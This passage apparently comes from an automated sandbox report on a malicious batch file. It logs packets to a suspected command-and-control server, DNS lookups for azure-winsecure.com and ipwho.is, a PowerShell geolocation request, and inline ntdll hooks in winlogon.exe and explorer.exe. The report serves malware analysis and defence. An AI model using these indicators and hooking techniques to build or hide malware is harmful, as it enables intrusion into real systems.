                                          Oct 3, 2024 14:55:33.106714964 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.133718967 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.138793945 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.138885021 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.143733978 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.510885954 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.558501005 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.684617996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.730470896 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.730470896 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.730504036 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.735420942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.735472918 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.735486031 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.735577106 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.735624075 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.740505934 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.740559101 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.973261118 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.027358055 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.122256994 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.151256084 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.151256084 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.156229019 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.156286001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.156402111 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.378336906 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.433420897 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.530323982 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.555902958 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.560707092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.560756922 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.565566063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.943636894 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.995948076 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.106923103 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.134718895 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.139614105 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.139700890 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.144634008 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.517231941 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.558692932 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.668900967 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.697374105 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.702502012 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.702589035 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.707375050 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.074016094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.120951891 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.231549025 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.260601997 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.265521049 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.265634060 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.270450115 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.638216972 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.683558941 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.793958902 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.820868015 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.825834990 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.825901031 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.832197905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.248059988 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.292885065 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.403556108 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.430474043 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.435559988 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.435636044 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.440450907 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.819128036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.870976925 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.981472015 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.009037018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.015697002 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.015795946 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.021684885 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.396416903 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.449153900 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.571841955 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.602292061 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.611259937 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.611390114 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.620629072 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.990277052 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.042867899 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.169641018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.197402000 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.202505112 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.202594995 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.207422018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.601067066 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.652200937 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.782212973 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.829096079 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.913870096 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.913943052 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.104341030 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.104454994 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.105720043 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.105794907 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.105895996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.105910063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.105942011 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.105957985 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.106062889 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.106106043 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.112087011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.112406969 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.112421036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.112433910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.441909075 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.496079922 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.622070074 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.652365923 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.652401924 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.662141085 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.662822962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.665744066 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.058305979 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.105386972 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.200294018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.244218111 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.249239922 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.249336004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.254640102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.641037941 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.683491945 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.812910080 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.840970039 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.859203100 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.859306097 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.868592024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.269289970 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.324213028 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.388667107 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.433604002 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.440294027 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.473388910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.473615885 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.503029108 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.855595112 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.902178049 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.998545885 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.042850018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.045347929 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.066911936 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.066979885 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.101300001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.440687895 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.496021032 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.593276024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.623800993 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.629549026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.629637957 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.634706020 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.995143890 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.042821884 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.194350958 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.234638929 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.252012014 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.252089024 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.257319927 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.643124104 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.683569908 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.949554920 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.953795910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.953867912 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.978641987 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.978717089 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.017189980 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.017255068 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.017286062 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.019164085 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.261955023 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.308576107 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.423585892 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.451107979 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.452374935 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.463459969 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.468787909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.468862057 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.468868971 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.685282946 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.730379105 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.869474888 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.917813063 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.938278913 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.938359022 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.948208094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948234081 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948246956 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948342085 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.948646069 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948659897 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.964231014 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.964247942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.964260101 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.201332092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.245939016 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.357914925 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.402251005 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.408842087 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.408893108 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.413886070 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.413966894 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.414000034 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.659912109 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.714776039 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.796941042 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.839806080 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.846767902 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.851802111 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.852567911 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.857553005 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.217989922 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.261593103 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.372720957 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.417809963 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.418920994 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.423901081 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.423995018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.428976059 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.791979074 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.839696884 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.955009937 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.995927095 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:12.964704037 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:12.969806910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.436321974 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:14.441572905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.441646099 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:14.446588993 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.828397036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.870960951 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:14.982551098 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.023154974 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:15.028198957 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.028291941 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:15.033253908 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.578025103 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.578609943 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.578682899 CEST591726969192.168.2.6154.216.20.132

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 3, 2024 14:54:25.659888983 CEST5350814162.159.36.2192.168.2.6
                                          Oct 3, 2024 14:54:26.514218092 CEST53579391.1.1.1192.168.2.6
                                          Oct 3, 2024 14:54:44.148282051 CEST4989953192.168.2.61.1.1.1
                                          Oct 3, 2024 14:54:44.368469954 CEST53498991.1.1.1192.168.2.6
                                          Oct 3, 2024 14:54:46.423022985 CEST5136753192.168.2.61.1.1.1
                                          Oct 3, 2024 14:54:46.429874897 CEST53513671.1.1.1192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 3, 2024 14:54:44.148282051 CEST192.168.2.61.1.1.10x1b3bStandard query (0)azure-winsecure.comA (IP address)IN (0x0001)false
                                          Oct 3, 2024 14:54:46.423022985 CEST192.168.2.61.1.1.10xd10fStandard query (0)ipwho.isA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 3, 2024 14:54:44.368469954 CEST1.1.1.1192.168.2.60x1b3bNo error (0)azure-winsecure.com154.216.20.132A (IP address)IN (0x0001)false
                                          Oct 3, 2024 14:54:46.429874897 CEST1.1.1.1192.168.2.60xd10fNo error (0)ipwho.is147.135.36.89A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • ipwho.is

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.659173147.135.36.894437088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-03 12:54:47 UTC150OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                          Host: ipwho.is
                                          Connection: Keep-Alive
                                          2024-10-03 12:54:47 UTC223INHTTP/1.1 200 OK
                                          Date: Thu, 03 Oct 2024 12:54:47 GMT
                                          Content-Type: application/json; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Server: ipwhois
                                          Access-Control-Allow-Headers: *
                                          X-Robots-Tag: noindex
                                          2024-10-03 12:54:47 UTC1019INData Raw: 33 65 66 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72
                                          Data Ascii: 3ef{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.33", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yor


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                          NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                          ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                          NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                          ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                          NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                          NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                          ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                          ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                          NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                          RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                          NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                          NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                          ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                          ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                          Processes

                                          Process: winlogon.exe, Module: ntdll.dll
                                          Function NameHook TypeNew Data
                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                          Process: explorer.exe, Module: ntdll.dll
                                          Function NameHook TypeNew Data
                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:08:53:41
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
                                          Imagebase:0x7ff630570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:08:53:41
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
